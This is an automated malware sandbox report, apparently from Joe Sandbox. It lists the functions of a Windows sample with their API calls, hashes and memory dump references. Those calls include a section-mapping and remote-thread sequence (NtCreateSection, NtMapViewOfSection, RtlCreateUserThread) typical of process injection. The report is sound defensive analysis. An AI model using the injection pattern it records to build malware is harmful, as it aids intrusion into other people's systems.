Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760

Function 004025DD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288

Function 0040267C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043

Function 004237C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00423834
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 0042383D
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 0042384C
Sleep.KERNEL32(00000000), ref: 00423853

Strings

-, xrefs: 00423868

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 3454512315-2547889144
Opcode ID: 29156e8aa9af76726b85f86d88912033705afe91e56e5ce620a0a2eedcc3ba6e
Instruction ID: 5a24bc0650528eea3c32b47b4a62c7c0ce5515a05f11029debdc5be1182a44fc
Opcode Fuzzy Hash: 29156e8aa9af76726b85f86d88912033705afe91e56e5ce620a0a2eedcc3ba6e
Instruction Fuzzy Hash: 9C2196B1A00128EBCB219F15EC84DAF77B8FB85715F4080ADF659A7141C7384A86CF6D

Function 00423632 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(0043A3B0), ref: 004236FE
GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042373B

Strings

, xrefs: 00423684
VirtualProtect, xrefs: 00423704

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: $VirtualProtect
API String ID: 1646373207-947944765
Opcode ID: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction ID: bdfdf514c03e345525c3e16444427038d7ddc4cf5038b4f5b94db7108e4316be
Opcode Fuzzy Hash: e0e411ff4c247a5316448fc5701780ceddf569871ef39cf7942b1ea1165f1dde
Instruction Fuzzy Hash: 2631651569C3C0D9F331CBA8BC857297B62AB11B14F54307AD9848B2F1D3FA056A836F

Function 0042470B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00424731

Part of subcall function 00424556: __fltout2.LIBCMT ref: 00424582

__cftog_l.LIBCMT ref: 00424757
__cftoe_l.LIBCMT ref: 00424789

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 29c8883dd3ed5d8ab0f45916fb4b7f0a01db229a1e75b3cb984d75e26a57ebf3
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 7511723210006DBBCF125F84EC41CEE3F26FB99354B998516FE2859131C33AC9B1AB85

Function 0042388D Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(0042840C,00000000,?,00000000), ref: 004238C7
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004238E1
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004238FF
SetFileShortNameA.KERNEL32(00000000,00428428), ref: 0042390B

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID:
API String ID: 4071102102-0
Opcode ID: bb6f0e06b3ff5238140b2e68e598750acc13a1c451ee61dbf95c906f3602a2c7
Instruction ID: 54a63d936d2bb86c8b969f01a833e19422160a2cc5764942cb2e449c65f369aa
Opcode Fuzzy Hash: bb6f0e06b3ff5238140b2e68e598750acc13a1c451ee61dbf95c906f3602a2c7
Instruction Fuzzy Hash: E7015271304114AFDB20AB69FC49D6B73BCE785716B80003AF501D3151DA7C59468B6E

Analysis Process: ssegbthPID: 7928, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	21.7%
Signature Coverage:	0%
Total number of Nodes:	129
Total number of Limit Nodes:	6

Executed Functions

Function 00423920 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 242
timememorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0042399E
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004239A5
GetCommandLineA.KERNEL32 ref: 004239AB
lstrcatW.KERNEL32(?,00000000), ref: 004239D0
InterlockedExchange.KERNEL32(?,00000000), ref: 004239DC
GetActiveWindow.USER32 ref: 004239E2
RtlTryEnterCriticalSection.NTDLL(?), ref: 004239ED
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00423A03
IntersectRect.USER32(?,?,00000000), ref: 00423A14
DebugActiveProcessStop.KERNEL32(00000000), ref: 00423A1B
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00423A24
GlobalDeleteAtom.KERNEL32(00000000), ref: 00423A2B
GetTimeZoneInformation.KERNEL32(?), ref: 00423A39
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00423A41
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00423A62
DebugBreak.KERNEL32 ref: 00423A68
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00423A71
SetCommMask.KERNELBASE(00000000,00000000), ref: 00423AA2
GetTickCount.KERNEL32 ref: 00423AA8
GetSystemTimes.KERNELBASE(?,?,?), ref: 00423ABD
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00423AE3
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00423B05
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00423B0E
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00423B22
GlobalAlloc.KERNELBASE(00000000), ref: 00423BA0
LoadLibraryA.KERNELBASE(004284C0), ref: 00423BE3

Strings

VirtualProtect, xrefs: 00423B55, 00423B5A, 00423B73
}$, xrefs: 00423C07

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: ActiveAtomCommDebugDeleteGlobalNameTimerWaitable$AllocBreakCommandComputerConfigConsoleCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsInformationInterlockedIntersectLibraryLineLoadLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZonelstrcat
String ID: VirtualProtect$}$
API String ID: 640544185-3575559497
Opcode ID: c76a4da30d26f9753a4a6e26cc0a53690939db44dd39906d20c4878ff509fdf9
Instruction ID: 651746614786403ae795aaf106f979abae7fecea218118d0f79c0c36b77b1f99
Opcode Fuzzy Hash: c76a4da30d26f9753a4a6e26cc0a53690939db44dd39906d20c4878ff509fdf9
Instruction Fuzzy Hash: 25719272606530AFC221AF61EC4DD9F3B6CEF46355B80043AF58592161DB3C5646CBAE

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 0069003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0069024D

Strings

cess, xrefs: 0069018D
kernel32.dll, xrefs: 0069008F, 00690095

Memory Dump Source

Source File: 00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_ssegbth.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 140014281f232d73c5b5b70af8a07088a6aea8746e22366a111cd5cdace416ca
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 5B527874A00229DFDB64CF98C984BA8BBB5BF09314F1480D9E90DAB751DB30AE85DF14

Function 006FC4C1 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FC4E9
Module32First.KERNEL32(00000000,00000224), ref: 006FC509

Memory Dump Source

Source File: 00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f9000_ssegbth.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8d2f8db469841dc541d1f442d2d9f478b2a333046620ebf6e9a17fd0ae744e8e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EAF0C23110031D6BD7203BB8A98CBBE72E9AF48334F100228F742D11C0DA70EC054661

Function 00690E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00690223,?,?), ref: 00690E19
SetErrorMode.KERNELBASE(00000000,?,?,00690223,?,?), ref: 00690E1E

Memory Dump Source

Source File: 00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_ssegbth.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: a53b4cd0a2bb93b1e94809e4369bf6e9fef269dc18b7e37b3fd79448240e14a7
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 89D0123514512877DB002A94DC09BCD7B1DDF05B62F008411FB0DD9580C770994146E5

Function 00423614 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?,?,?,00423BF3), ref: 0042362A

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 006FC180 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FC1D1

Memory Dump Source

Source File: 00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6f9000_ssegbth.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d520e3e769e6318fce5cfdb5982e1bcbe73ffc46a0a25aacbc07a3891cf90092
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4C112D79A40208EFDB01DF98CA85E99BFF5EF08351F058095FA489B361D771EA50DB80

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000005.00000002.2175001590.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ssegbth.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Non-executed Functions

Function 004237C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00423834
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 0042383D
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 0042384C
Sleep.KERNEL32(00000000), ref: 00423853

Strings

-, xrefs: 00423868

Memory Dump Source

Source File: 00000005.00000002.2175026422.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_416000_ssegbth.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 3454512315-2547889144
Opcode ID: 29156e8aa9af76726b85f86d88912033705afe91e56e5ce620a0a2eedcc3ba6e
Instruction ID: 5a24bc0650528eea3c32b47b4a62c7c0ce5515a05f11029debdc5be1182a44fc
Opcode Fuzzy Hash: 29156e8aa9af76726b85f86d88912033705afe91e56e5ce620a0a2eedcc3ba6e
Instruction Fuzzy Hash: 9C2196B1A00128EBCB219F15EC84DAF77B8FB85715F4080ADF659A7141C7384A86CF6D

Function 00423632 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(0043A3B0), ref: 004236FE
